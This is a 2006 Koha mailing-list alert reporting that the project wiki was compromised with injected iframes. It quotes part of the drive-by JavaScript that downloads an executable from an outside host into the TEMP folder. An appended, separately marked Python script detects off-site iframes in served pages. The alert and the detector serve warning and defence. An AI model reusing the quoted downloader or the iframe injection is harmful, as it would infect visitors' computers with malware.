[koha-Infos] [DANGER - URGENT - WARNING - URGENT] wiki.koha.org hacked
Paul POULAIN
paul.poulain at free.fr
Tue 26 Sep 18:45:23 CEST 2006
To everybody.
http://wiki.koha.org has been hacked: when you try to open a page,
something with a .wmf + a large javascript is loaded.
If you go to the wiki under Linux/Mac OS X, it is just impossible to use.
If you go to the wiki under MS-Windows, it's probably impossible to use
+ does some nasty things on your computer.
SO, AVOID GOING TO WIKI.KOHA.ORG
Kados / chris:
it seems (with lynx, which doesn't enjoy javascript ;-) ) that all pages
contain at the top an iframe to
IFRAME: http://uniqcount.net/adv/new.php?adv=9
IFRAME: http://uniqcount.net/adv/09/new3.php
Going to this address gives a page with javascript containing:
============================================
Log('Ceating the XMLHTTP object...');
var url = "http://uniqcount.net/adv/09/win32.exe"; var xml = null;
var bin = e.Item("TEMP")+ "\\" + "metasploit.exe";
var dat;
try { xml=new XMLHttpRequest(); }
catch(e) {
try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
catch(e) {
xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
===========================================
metasploit.exe is something really nasty:
http://seclists.org/vuln-dev/2004/Apr/0011.html
--
Paul POULAIN and Henri Damien LAURENT
Independent consultants
in free software and library science (http://www.koha-fr.org)
Tel: 04 91 31 45 19
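
As an added example (not part of the original message), one way a site administrator could check served pages for the kind of injected iframe described above: the Python code below lists every iframe whose source host is not on an allowlist. The host names, URLs and the sample page are constructed for illustration.

```python
# Added example: report <iframe> tags that load from hosts outside an allowlist.
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class IframeAudit(HTMLParser):
    def __init__(self, page_url, allowed_hosts):
        super().__init__()
        self.page_url = page_url
        self.allowed = {h.lower() for h in allowed_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        # Resolve relative sources against the page; a missing src resolves
        # to the page itself and is therefore treated as same-site.
        src = urljoin(self.page_url, a.get("src", ""))
        host = (urlparse(src).hostname or "").lower()
        if host in self.allowed:
            return
        style = a.get("style", "").replace(" ", "").lower()
        # Injected frames are often sized or styled to be invisible.
        hidden = (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                  or "display:none" in style or "visibility:hidden" in style)
        self.findings.append({"line": self.getpos()[0], "src": src,
                              "host": host, "hidden": hidden})


def audit(html, page_url, allowed_hosts):
    """Return one finding per iframe whose host is not in allowed_hosts."""
    parser = IframeAudit(page_url, allowed_hosts)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: an off-site frame prepended to an otherwise normal page.
SAMPLE_PAGE = """<iframe src="http://injected.example/x.php" width="0" height="0"></iframe>
<html><body>
<h1>Wiki start page</h1>
<iframe src="/lib/preview.php"></iframe>
<iframe src="http://wiki.example.org/help"></iframe>
</body></html>"""

if __name__ == "__main__":
    for f in audit(SAMPLE_PAGE, "http://wiki.example.org/start", {"wiki.example.org"}):
        print(f"line {f['line']}: iframe -> {f['src']} (hidden={f['hidden']})")
```

Run against every page the wiki serves, a finding that repeats at the same position on all pages points to a modified template or header file rather than to edited page content.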